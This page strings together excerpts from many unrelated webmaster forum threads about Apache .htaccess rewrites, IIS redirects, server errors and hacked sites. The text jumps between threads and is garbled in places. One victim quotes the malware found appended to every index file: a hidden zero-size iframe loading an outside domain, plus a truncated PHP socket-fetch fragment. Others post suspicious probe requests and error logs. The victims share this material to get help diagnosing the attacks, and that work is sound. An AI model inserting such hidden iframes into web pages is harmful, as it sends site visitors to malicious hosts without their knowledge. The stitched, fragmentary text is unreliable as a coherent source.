Wierd Htaccess Url Rewrite- Rewrites All Index Files
Apr 19, 2008
I have worked with mod_rewrite for years and never encountered this problem. I am converting html pages to a single php file and it works perfectly. I used htaccess the rewrite the urls to appear the same so that no links would be broken or lose SEO value.
The only problem is that my friend who also helped build the sites added different directories and within those directories are index.htm files that serve as a home page for the separate directory. Like /info/index.htm and /help/index.htm within the root directory. The problem is that for some reason my mod_rewrite directs to the main index.htm rewrite even if I include the whole path to the file. In htaccess I have this so far:
RewriteEngine on
RewriteRule index.htm$ index.php [L]
RewriteRule servers.htm$ index.php?action=servers [L]
RewriteRule movies.htm$ index.php?action=movies [L]
However there is a directory named "info" and inside that directory it has an index.htm file and it seems to conflict with my first mod_rewrite. I tried using:
RewriteRule /info/index.htm$ index.php?action=info [L]
and used other methods but none seem to work any ideas?
My site was hacked today, all pages named index.html were hacked. It is kind of script since all pages were written same time.
I'm using a very respectable hosting. I jumped from another hosting were I was exposed on a unsecured host (they moved my account to an insecure host without asking).
Going back on track, all files named "%index%" were hacked.
-I found a index.txt file with links to obscure sites.
The code was written at bottom of the all index.html files: iframe code
Code: ><!-- ~ --><iframe src="http://googletraff.com/in.cgi?default" width="0" height="0" style="display:none"></iframe><!-- ~ --> Also a line.php with the following code
");$wr = 0;while(!feof($socket)){ $temp = fgets($socket); if(eregi("<",$temp)) { $wr = 1; } if($wr) { $page .= $temp; } } fclose($socket); return $page; } ?> So far I recover the files from backup, secured the config.php files and modify %index% to read only...finally changed the password...
I see following errors in my server ie. httpd error logs:
Code: [Mon Mar 30 07:23:55 2009] [error] mod_ssl: SSL handshake failed (server localhost:443, client 79.132.204.192) (OpenSSL library error follows) [Mon Mar 30 07:23:55 2009] [error] OpenSSL: error:1408F455:SSL routines:SSL3_GET_RECORD:decryption failed or bad record mac [Mon Mar 30 07:23:55 2009] [error] mod_ssl: SSL handshake failed (server localhost:443, client 60.63.241.18) (OpenSSL library error follows) [Mon Mar 30 07:23:55 2009] [error] OpenSSL: error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol [Hint: speaking not SSL to HTTPS port!?] [Mon Mar 30 07:23:56 2009] [error] [client 114.224.169.0] File does not exist: /var/www/html/XRkVCfvCJ/GzTk/ChDbhf/-YSDDv/1Sch/2hfMMf/-M0DO/ACDEzXMEM/CYSkGFj/SGXtEUX0W/0KMV/RKJ2fTUDC/bFT/SX00/VtJVht/D1XvJBgHP/5lll.gif [Mon Mar 30 08:46:42 2009] [error] server reached MaxClients setting, consider raising the MaxClients setting In last you can see that MySQL reached maximum allowed client ..and it crashed
Also, at regular intervals I see such requests: /var/www/html/XRkVCfvCJ/GzTk/ChDbhf/-YSDDv/1Sch/2hfMMf/-M0DO/ACDEzXMEM/CYSkGFj/SGXtEUX0W/0KMV/RKJ2fTUDC/bF/SX00/VtJVht/D1XvJBgHP/5lll.gif
Also I see SSL handshake failure notices while I do not have any SSL cert or SSL running site on this server.
My issue is with my code I have it rewwrites my addon domains to the main domain. I have a addon domain exclusion line. But each time I add a domain I have to go in and edit the htaccess. I foresee lots of addon domains in my future.
When someone types in myforum.com/forums.html I want it to display the main forum (myforum.com) with ...../forums.html in the url bar. But without actually having a forums.html file present on the server. Can this be accomplished with htaccess?
I'm trying to rewrite the urls across a site I'm developing, which pass get variables like the following:
localhost/link/link1/page.php?id=12 would look like: localhost/page/12
The first link in the htaccess file works fine, but the following ones don't (whatever the order, the first one works). I'm attaching a snippet of the file here:
I'm trying to change url structure so instead of /default/category/product.html it would show /category/product.html
With this line I've managed to do it on my personal blog
RedirectMatch 301 /default/(.*) //$1
But when I've implemented it on a customers Magento site it started showing double slashes like this //category/product.html and the whole template just collapsed .
I simply want to rewrite a hash # or other symbol to a question mark via htaccess. So any hash in the URL anywhere should internally rewrite to a ?. All I want is to remove ? from the URL really.
It should be a straight forward change. [URL] .... does not redirect to [URL]...... It simply tries to load /denver-cars/ and denver-cars is in the URL. Am I missing something here? I have tried moving it up and down the list of rules and have tried numerous types of flags to no avail. Everything else in the htacess works fine with out the line:
Options +FollowSymlinks RewriteEngine on RewriteBase / # Force www # Redirect google index dir's to new dir RewriteRule ^/(.*)-cars/ /newcars-in-$1/ [NC,R=301,L]
after week when my server upgrade the cpanel automatic i got infected in all index files like index.html and index.php and index.asp and any index with any extinstion and this is the code in all files
Code: <iframe src=[url]
and when i delete this code it come again in all index files
i am in really trouble with my clients and i want to know how can i fix this thing and never come back again
I was working on WHM of my server sudeenly i saw CPU load was increasing and till when i understand CPU load was on peak of 160%. I tried to find out CPU overloading sites and found that my 4 populer sites were creating problem. I stopped apache and suspanded all 4 sites and rebooted server. After forceful server reboot i found that load was getting normal to 2.5%. I unsuspanded one of 2 forums but even i unsuspanded that forum was not opening (IPB). I logged into ftp suspecting some problem i found that index.php was only 45bytes i have opend index.php and found this text inside .....
in wordpress is wp-includes folder, i dont want anyone just execute file from this directory so it just serve wordpress not any malicious file be executed from there,
so i added this rule into /wp-includes/.htaccess: RewriteRule ^(wp-includes)/.*$ ./ [NC,R=301,L]
Have a website that is making use of both index.html and index.php files as the main page. How can I achieve either through .htaccess or similar (shared hosting) to have the users directed to index.html and not load the index.php first off.
I have a directory on my web server that should not be accessible by default, the files in here are being included by php files outside the directory.. so quite simply, I need to protect the directory.
Now I don't want to protect it with a login, that's simply not needed, the directory and all the files in it should simply be inaccessible..
I don't know a whole lot about htaccess though, can anyone here tell me what to put in the .htaccess files to simply deny all access to the directory and if possible display a specific error message.
I am implementing one of my clients new sites ( the old site is written in plain html), and their new site uses ASP on every page.
The problem is that their old index.htm page has a pagerank of 4 which we want to keep.
And I have been advised that i need to do a 301 redirect to pass that PageRank onto their new index.asp page.
The other problem is that they are on a shared IIS hosting solution (with FastHosts), and obviously I don;t have total control over the server so cannot get into the root control panel.
My question is, whats the IIS alternative to .htaccess, which can be implemented on a limite-controlled IIS server?
JavaScript, I have heard is completely out the question
Apache httpd Users mailing list, but nobody there has responded in several days. I'm using mod_alias to map URLs to directories that are outside of Apache's DocumentRoot. However, it seems that .htaccess files are being ignored in these directories.
I have download manager script that I use for my customers to download products right after the purchase.
Script generates download link that looks like this:
http://www.yourwebsite.com/download/...582921B&p=1840 (where 2YY6582921B is receipt number that is different with each purchase).
All products are placed in one folder. This folder can not be seen in above download url, but can be accessed thru browser and files can be downloaded that way without paying for them.
Can I use .htaccess and if yes how, to protect all product files the way that they can not be accessed directly by visiting url thru browser (in case somebody will find the correct url), they should be allowed for access only for my download manager script.
I am talking like a few thousand sites per server (actually a pair that act as a unified server, routing for load balancing). In a muli-thousand site IIS server, will having ISAPI Rewrites enables for ALL of the IIS virtual sites cause performance to degrade?
Yesterday i have upgraded PHP 4.4.6 to 5.x ,then checked all my scripts/pages and everything was fine.
Today i have upgraded MySQL 4 to 5 and recompiled PHP and scripts are working fine but all my Russian langauge pages are broken,i mean plain php pages ,not those that depends on scripts.
Its wierd,when i am opening them in Firefox they are opening with Win1251 encoding as supposed but when i am opening them in IE they are opening with KOI8 encoding and i have to manualy change teh encoding to Win1251 to view the pages. This has been confirmed by other users.
I recompiled apache and php due to some problems. Now apache and php is running and I have a VB forum running fine. However, one folder has a PHP page named index.php when I type its URL I get it downloaded and it is not executed directly from the server.
when I add "?" to the end of the URL[url]" it runs with no problems!
I've just been having a look through my logwatch e-mail, and have seen the following that I've not seen before:
Code: A total of 3 unidentified 'other' records logged GET http:/ /74.52.21.101/index.php2?goto=[url] HTTP/1.0 with response code(s) 2 404 responses GET http:/ /74.52.21.100/index.php2?goto=[url] HTTP/1.0 with response code(s) 2 404 responses GET http:/ /74.52.21.102/index.php2?goto=[url] HTTP/1.0 with response code(s) 2 404 responses NB. I've added a space in the URL to break the link.
what is happening here, as this looks to be something dodgy.
